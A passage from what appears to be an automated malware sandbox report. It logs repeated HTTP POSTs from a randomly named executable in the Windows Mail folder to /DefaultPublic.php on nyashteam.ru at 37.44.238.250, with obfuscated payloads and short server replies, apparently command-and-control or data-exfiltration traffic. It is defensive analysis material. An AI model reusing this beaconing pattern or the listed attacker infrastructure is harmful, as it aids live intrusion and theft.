Nov 25, 2024 22:37:33.739078045 CET	1744	OUT	Data Raw: 5f 5a 5f 5f 5d 59 50 55 59 59 54 56 57 5c 55 58 58 54 5b 58 59 50 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _Z__]YPUYYTVW\UXXT[XYPVGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#$#"_<05<'6-Y!48V; )(<\?:&,2<(>&\%#P-8
Nov 25, 2024 22:37:34.713066101 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:34.961298943 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 59 23 3e 3f 1a 27 13 36 56 2b 3c 2c 06 25 28 00 01 25 2e 23 18 22 42 3e 06 26 2c 3f 16 20 05 3d 07 28 3d 32 0b 27 3e 04 12 24 31 2e 51 01 13 21 06 35 20 22 0f 2f 33 2b 14 32 2b 38 43 26 21 00 16 2a 3e 34 0e 36 0a 2e 03 3c 54 2d 59 38 3f 33 00 2a 15 2c 01 2f 23 34 0a 21 2f 2e 5f 08 13 23 53 3e 3f 3b 55 25 37 2b 5f 25 12 24 0e 35 04 3e 52 27 23 21 54 36 3c 27 5e 3f 3d 05 03 21 58 35 0e 33 2e 26 5c 24 57 37 50 30 29 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %Y#>?'6V+<,%(%.#"B>&,? =(=2'>$1.Q!5 "/3+2+8C&!>46.<T-Y8?3,/#4!/._#S>?;U%7+_%$5>R'#!T6<'^?=!X53.&\$W7P0)"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:34.473522902 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:37:34.832802057 CET	1048	OUT	Data Raw: 5f 5a 5f 59 58 5b 55 53 59 59 54 56 57 5a 55 5f 58 59 5b 5d 59 5c 56 43 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _Z_YX[USYYTVWZU_XY[]Y\VCZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV '3(:?' 2%"'3/(7+;(\2-68'(.&\%#P-
Nov 25, 2024 22:37:35.790175915 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:36.032893896 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:36.284053087 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:37:36.667327881 CET	1048	OUT	Data Raw: 5a 5d 5f 5d 5d 58 55 50 59 59 54 56 57 51 55 5d 58 54 5b 53 59 5c 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z]_]]XUPYYTVWQU]XT[SY\VGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [3?:4]$%<Y&\#',V;;+<0](9-5=((>&\%#P-
Nov 25, 2024 22:37:37.646228075 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:37.902936935 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:38.180342913 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:38.535978079 CET	1048	OUT	Data Raw: 5a 5b 5f 5f 58 5d 55 5a 59 59 54 56 57 5a 55 5c 58 5b 5b 5a 59 51 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z[__X]UZYYTVWZU\X[[ZYQVBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [%#!<98$67&1!$/+<+(;!!-_(&\%#P-
Nov 25, 2024 22:37:39.496450901 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:39.740746021 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49751	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:40.072571039 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:40.426644087 CET	1048	OUT	Data Raw: 5a 55 5f 5b 58 5d 50 52 59 59 54 56 57 5a 55 5c 58 5c 5b 5c 59 5a 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZU_[X]PRYYTVWZU\X\[\YZVGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#0<9#'%$1-#4W,^4+,[?!-:%0_='\(&\%#P-
Nov 25, 2024 22:37:41.354441881 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:41.587713957 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49752	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:40.095246077 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1716 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:40.442308903 CET	1716	OUT	Data Raw: 5f 59 5f 58 5d 5a 55 51 59 59 54 56 57 58 55 5b 58 55 5b 5d 59 59 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _Y_X]ZUQYYTVWXU[XU[]YYVFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV X30"?]'%#&5Z"(T88?;$<":&#*1+_(&\%#P-
Nov 25, 2024 22:37:41.479908943 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49753	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:41.830177069 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:42.176837921 CET	1048	OUT	Data Raw: 5f 5a 5a 5f 5d 5d 50 51 59 59 54 56 57 59 55 5b 58 5e 5b 59 59 59 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _ZZ_]]PQYYTVWYU[X^[YYYVFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#31+\?0&5)[5?/W('*!.\-C$>1+(>&\%#P-,
Nov 25, 2024 22:37:43.192138910 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:43.446218967 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:43.691044092 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:44.036031008 CET	1048	OUT	Data Raw: 5a 58 5a 5f 58 5b 55 53 59 59 54 56 57 59 55 53 58 5c 5b 5b 59 5f 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZXZ_X[USYYTVWYUSX\[[Y_VHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [$31(?$(Z%%*",+#+($+:]=^?.&\%#P-,
Nov 25, 2024 22:37:45.007061958 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:45.249711037 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49755	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:45.597682953 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:45.942336082 CET	1048	OUT	Data Raw: 5a 55 5f 5a 58 5b 55 51 59 59 54 56 57 51 55 5e 58 58 5b 59 59 5c 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZU_ZX[UQYYTVWQU^XX[YY\VIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV '&<)'$$[&C=]5B8R,<(+:C'>"]?>&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:46.721268892 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:47.067822933 CET	1764	OUT	Data Raw: 5f 59 5a 5b 5d 59 55 51 59 59 54 56 57 5e 55 52 58 5f 5b 58 59 50 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _YZ[]YUQYYTVW^URX_[XYPVDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#'>? ]$$Y%C)Y#$ S8'U+( \?!>:(Z=!8?>&\%#P-0
Nov 25, 2024 22:37:48.024573088 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:48.259761095 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 5f 37 3e 3f 56 33 13 0c 52 3d 3c 2b 5f 32 38 31 59 24 03 28 0b 23 37 3e 00 26 3f 33 50 22 3f 36 1d 3f 3e 2d 53 33 2e 22 5a 27 0b 2e 51 01 13 22 13 21 20 31 1f 38 0d 01 5c 32 28 20 42 26 21 32 18 28 00 38 0b 36 23 3e 00 3c 31 25 5c 3b 02 23 04 29 5d 20 01 3b 0e 37 51 21 05 2e 5f 08 13 23 1e 3d 3f 28 0b 24 24 37 5b 31 2f 3b 1c 35 39 39 0a 33 33 31 1f 36 3f 3b 1a 29 2e 2c 10 21 2d 3e 52 33 2e 3e 5b 30 57 2c 0b 25 29 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %_7>?V3R=<+_281Y$(#7>&?3P"?6?>-S3."Z'.Q"! 18\2( B&!2(86#><1%\;#)] ;7Q!._#=?($$7[1/;5993316?;).,!->R3.>[0W,%)"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49757	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:46.880842924 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:47.241985083 CET	1048	OUT	Data Raw: 5f 5a 5a 5e 5d 5c 55 5b 59 59 54 56 57 5f 55 5b 58 5a 5b 5c 59 5a 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _ZZ^]\U[YYTVW_U[XZ[\YZV@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#332_+?3%'5\"B8T,8$);\<)-"<.&\%#P-
Nov 25, 2024 22:37:48.175981998 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:48.415868044 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:48.663162947 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:37:49.020395994 CET	1048	OUT	Data Raw: 5f 58 5f 5a 5d 5b 50 55 59 59 54 56 57 5e 55 53 58 59 5b 5c 59 58 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _X_Z][PUYYTVW^USXY[\YXVDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#' :[<98[&6<2&>!7;8^((+?<>X. \?2 +.&\%#P-0
Nov 25, 2024 22:37:50.025518894 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:50.278217077 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49759	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:51.086220026 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:37:51.442308903 CET	1048	OUT	Data Raw: 5f 5d 5a 58 5d 59 55 50 59 59 54 56 57 51 55 5a 58 55 5b 58 59 51 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _]ZX]YUPYYTVWQUZXU[XYQVIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV _%#2<9735'15\67'.;#R)8$[?9,5$_*+&\%#P-
Nov 25, 2024 22:37:52.356625080 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:52.592216015 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49760	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:52.846168041 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:53.192446947 CET	1048	OUT	Data Raw: 5f 58 5a 59 5d 50 55 55 59 59 54 56 57 5c 55 5c 58 5a 5b 5c 59 5f 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _XZY]PUUYYTVW\U\XZ[\Y_VDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Z'*^?731-Z#4;/$?,+2Z-%=!+[<>&\%#P-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49761	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:53.407455921 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:53.755064964 CET	1764	OUT	Data Raw: 5a 54 5f 5f 5d 59 50 56 59 59 54 56 57 51 55 58 58 5f 5b 5c 59 51 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZT__]YPVYYTVWQUXX_[\YQVGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#'3('4_21#$?/V?/+1.X.(^1+.&\%#P-
Nov 25, 2024 22:37:54.760787964 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:54.999799967 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 5f 23 2e 33 53 24 03 2e 54 2a 3f 2f 5f 31 28 00 00 33 3d 28 08 36 24 21 59 30 3c 24 08 37 05 2e 5a 29 2e 29 1d 24 2d 29 00 26 31 2e 51 01 13 22 5a 36 0d 2d 54 38 0d 2b 5e 26 3b 3b 19 26 21 0f 05 2b 2e 27 14 36 33 2e 01 3c 21 26 01 3b 3c 20 5c 29 05 3b 1d 3b 30 2b 50 35 3f 2e 5f 08 13 20 0a 2a 01 09 1e 27 34 24 06 25 2c 34 0f 23 39 31 0d 24 0d 03 1c 22 12 0d 17 28 03 02 5c 36 3d 2e 56 26 2e 25 05 27 32 28 08 24 39 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %_#.3S$.T?/_1(3=(6$!Y0<$7.Z).)$-)&1.Q"Z6-T8+^&;;&!+.'63.<!&;< \);;0+P5?._ '4$%,4#91$"(\6=.V&.%'2($9"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49762	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
